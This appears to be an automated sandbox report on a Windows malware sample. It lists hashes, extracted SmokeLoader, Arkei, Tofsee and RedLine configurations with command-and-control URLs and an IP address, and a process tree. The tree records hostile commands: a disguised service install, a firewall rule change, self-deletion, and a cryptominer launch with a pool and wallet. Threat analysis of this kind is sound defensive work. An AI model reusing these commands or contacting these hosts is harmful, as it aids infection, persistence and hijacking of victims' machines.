Analysis

  • max time kernel
    151s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    15/01/2022, 11:19

General

  • Target

    e4cfd91e111ae70cae6a95b899798f31a15faf333f155bc98ca1b7d668894a2f.exe

  • Size

    313KB

  • MD5

    40fb1ef2211bc5b1e0330c2eb5236fa0

  • SHA1

    c74d7625f4cd4320606cd5745207bb26b0fbee3f

  • SHA256

    e4cfd91e111ae70cae6a95b899798f31a15faf333f155bc98ca1b7d668894a2f

  • SHA512

    cb88f0455e3e85175fbd00f644be15eee0d9fa19e32ffd7b6e592a531ad922400e6fa3898583093252a9ee06f3de15eeb2351eec44a44000bf797739384862ca

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://host-data-coin-11.com/

http://file-coin-host-12.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

arkei

Botnet

Default

C2

http://file-file-host4.com/tratata.php

Extracted

Family

tofsee

C2

patmushta.info

parubey.info

Extracted

Family

redline

Botnet

noname

C2

185.215.113.29:34865

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
  • suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Arkei Stealer Payload 3 IoCs
  • XMRig Miner Payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 12 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e4cfd91e111ae70cae6a95b899798f31a15faf333f155bc98ca1b7d668894a2f.exe
    "C:\Users\Admin\AppData\Local\Temp\e4cfd91e111ae70cae6a95b899798f31a15faf333f155bc98ca1b7d668894a2f.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3992
    • C:\Users\Admin\AppData\Local\Temp\e4cfd91e111ae70cae6a95b899798f31a15faf333f155bc98ca1b7d668894a2f.exe
      "C:\Users\Admin\AppData\Local\Temp\e4cfd91e111ae70cae6a95b899798f31a15faf333f155bc98ca1b7d668894a2f.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:4056
  • C:\Users\Admin\AppData\Local\Temp\851A.exe
    C:\Users\Admin\AppData\Local\Temp\851A.exe
    1⤵
    • Executes dropped EXE
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:1088
  • C:\Users\Admin\AppData\Local\Temp\8BB3.exe
    C:\Users\Admin\AppData\Local\Temp\8BB3.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Checks processor information in registry
    • Suspicious use of WriteProcessMemory
    PID:3580
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\8BB3.exe" & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3048
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 5
        3⤵
        • Delays execution with timeout.exe
        PID:3124
  • C:\Users\Admin\AppData\Local\Temp\9038.exe
    C:\Users\Admin\AppData\Local\Temp\9038.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1428
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\aoplruox\
      2⤵
      PID:596
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\fmhydiub.exe" C:\Windows\SysWOW64\aoplruox\
      2⤵
      PID:1572
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" create aoplruox binPath= "C:\Windows\SysWOW64\aoplruox\fmhydiub.exe /d\"C:\Users\Admin\AppData\Local\Temp\9038.exe\"" type= own start= auto DisplayName= "wifi support"
      2⤵
      PID:1756
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" description aoplruox "wifi internet conection"
      2⤵
      PID:1016
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" start aoplruox
      2⤵
      PID:956
    • C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
      2⤵
      PID:1072
  • C:\Users\Admin\AppData\Local\Temp\921D.exe
    C:\Users\Admin\AppData\Local\Temp\921D.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2944
    • C:\Users\Admin\AppData\Local\Temp\921D.exe
      C:\Users\Admin\AppData\Local\Temp\921D.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2608
      • C:\Users\Admin\AppData\Local\Temp\ferrari2.exe
        "C:\Users\Admin\AppData\Local\Temp\ferrari2.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:3920
  • C:\Windows\SysWOW64\aoplruox\fmhydiub.exe
    C:\Windows\SysWOW64\aoplruox\fmhydiub.exe /d"C:\Users\Admin\AppData\Local\Temp\9038.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3772
    • C:\Windows\SysWOW64\svchost.exe
      svchost.exe
      2⤵
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:3776
      • C:\Windows\SysWOW64\svchost.exe
        svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2688
  • C:\Users\Admin\AppData\Local\Temp\F8A8.exe
    C:\Users\Admin\AppData\Local\Temp\F8A8.exe
    1⤵
    • Executes dropped EXE
    PID:2044
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 900
      2⤵
      • Suspicious use of NtCreateProcessExOtherParentProcess
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:2100
  • C:\Users\Admin\AppData\Local\Temp\FC33.exe
    C:\Users\Admin\AppData\Local\Temp\FC33.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:680
  • C:\Windows\SysWOW64\explorer.exe
    C:\Windows\SysWOW64\explorer.exe
    1⤵
    • Accesses Microsoft Outlook profiles
    • outlook_office_path
    • outlook_win_path
    PID:720
  • C:\Users\Admin\AppData\Local\Temp\1B3.exe
    C:\Users\Admin\AppData\Local\Temp\1B3.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:960
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe
    1⤵
    PID:872
  • C:\Users\Admin\AppData\Local\Temp\1655.exe
    C:\Users\Admin\AppData\Local\Temp\1655.exe
    1⤵
    • Executes dropped EXE
    PID:2016
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 400
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:2096
  • C:\Users\Admin\AppData\Local\Temp\1ED2.exe
    C:\Users\Admin\AppData\Local\Temp\1ED2.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:1248

Downloads